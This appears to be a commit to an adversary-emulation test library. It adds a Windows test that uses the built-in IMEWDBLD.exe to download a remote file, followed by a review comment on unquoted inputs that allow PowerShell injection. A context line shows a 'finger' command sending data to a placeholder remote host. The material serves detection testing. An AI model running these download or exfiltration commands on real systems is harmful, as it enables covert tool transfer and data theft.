T1105 add test download with imewdbld (#1621)

* Add test "Download a file with IMEWDBLD.exe"

IMEWDBLD.exe can be used to download files from third-party websites. This will throw an error for an invalid dictionary but the file will still be downloaded.
Commands to execute this activity and cleanup commands added.
Cleanup commands call on cmd.exe because PowerShell by default would not remove those files.
Disclosed by https://twitter.com/notwhickey
https://twitter.com/notwhickey/status/136749340683504026

* Update T1105.yaml

fixed typo test 17

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
Brian Thacker
2021-09-09 13:02:26 -05:00
committed by GitHub
parent 4114a92cfa
commit 6d46517d6f
+25
@@ -414,3 +414,28 @@ atomic_tests:
name: command_prompt
command: |
finger base64_filedata@#{remote_host}
- name: Download a file with IMEWDBLD.exe
description: |
Use IMEWDBLD.exe (built-in to windows) to download a file. This will throw an error for an invalid dictionary file.
Downloaded files can be found in "%LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>" or `%LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>.
Run "Get-ChildItem -Path C:\Users\<USERNAME>\AppData\Local\Microsoft\Windows\INetCache\ -Include <FILENAME>* -Recurse -Force -File -ErrorAction SilentlyContinue" without quotes and adding the correct username and file name to locate the file.
supported_platforms:
- windows
input_arguments:
remote_url:
description: Location of file to be downloaded.
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml
file_name:
description: Name of the file to be downloaded without extension.
type: string
default: T1105
executor:
command: |
$imewdbled = $env:SystemRoot + "\System32\IME\SHARED\IMEWDBLD.exe"
& $imewdbled #{remote_url}
cleanup_command: |
$inetcache = $env:LOCALAPPDATA + "\Microsoft\Windows\INetCache\"
$file_to_be_removed = [string[]] (Get-ChildItem -Path $inetcache -Include #{file_name}* -Recurse -Force -File -ErrorAction SilentlyContinue)
cmd.exe /c "del $file_to_be_removed"
name: powershell
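Review bot: the `#{remote_url}` and `#{file_name}` inputs are substituted unquoted into PowerShell on the lines `& $imewdbled #{remote_url}` and `-Include #{file_name}*`, so a URL or file name containing characters PowerShell parses (`&`, `;`, `$`, spaces) alters the command instead of being passed as the argument; wrap them as `& $imewdbled "#{remote_url}"` and `-Include "#{file_name}*"`. The cleanup then casts the Get-ChildItem results to `[string[]]` and interpolates the array into `cmd.exe /c "del $file_to_be_removed"`, which space-joins the elements, so several matches produce one unquoted multi-path argument and zero matches run `del` with no path at all; looping over the results and quoting each path, e.g. `foreach ($f in $file_to_be_removed) { cmd.exe /c "del `"$f`"" }`, handles both cases. Smaller points: `$imewdbled` looks like a typo for `$imewdbld`, and in the description the second INetCache path opens with a backtick that is never closed while both paths mix `\` and `/` separators.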